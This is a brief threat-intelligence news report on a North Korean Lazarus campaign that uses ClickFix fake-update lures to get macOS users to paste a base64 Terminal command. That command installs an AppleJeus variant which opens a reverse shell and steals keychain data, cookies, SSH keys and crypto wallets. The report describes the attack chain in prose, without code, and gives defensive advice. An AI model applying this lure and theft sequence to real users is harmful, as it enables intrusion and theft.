North Korea's Lazarus Targets macOS Users via ClickFix

Lazarus, the state‑sponsored advanced persistent threat (APT) group linked to North Korea, has launched a new campaign that specifically targets macOS users in organizations that rely heavily on Apple infrastructure. The operation, documented by Dark Reading, begins with a spear‑phishing email sent to senior executives and IT administrators at a Mac‑centric research firm. The message masquerades as a routine software update notification from a trusted vendor, containing a link that leads to a compromised web page.

On the malicious site, visitors are presented with a fraudulent "Critical Update Required" dialog that employs the ClickFix technique. The dialog instructs the user to open the macOS Terminal and paste a one‑line command that decodes and executes a base64‑encoded payload. The injected command downloads a Mach‑O binary that is signed with an abused Apple Developer ID, allowing it to bypass Gatekeeper. The binary is a variant of the AppleJeus malware family—internally tracked as MACLazarus—that establishes a reverse shell to an attacker‑controlled domain masquerading as an Apple iCloud support endpoint (e.g., apple‑icloud‑support.com).

Once on the victim’s machine, MACLazarus performs extensive reconnaissance, harvesting keychain entries, browser cookies from Safari and Chrome, SSH keys, and cryptocurrency wallet data stored in common locations such as ~/Library/Application Support/Electrum/. It also enumerates system information and exfiltrates the stolen artifacts over HTTPS to the C2 server. The malware leverages standard macOS APIs and legitimate system tools to blend in with normal activity, making detection challenging for traditional antivirus solutions.

Security teams are advised to enforce strict policies that block the execution of commands copied from web pages, enable macOS’s built‑in Terminal restrictions, and monitor for unusual base64 strings in endpoint telemetry. Deploying YARA rules that target the AppleJeus payload signatures and blocking the identified C2 domains can help mitigate the threat. The campaign has been linked to Lazarus (also known as Hidden Cobra) and follows the group’s ongoing focus on high‑value targets using socially engineered ClickFix lures.

Source: Dark Reading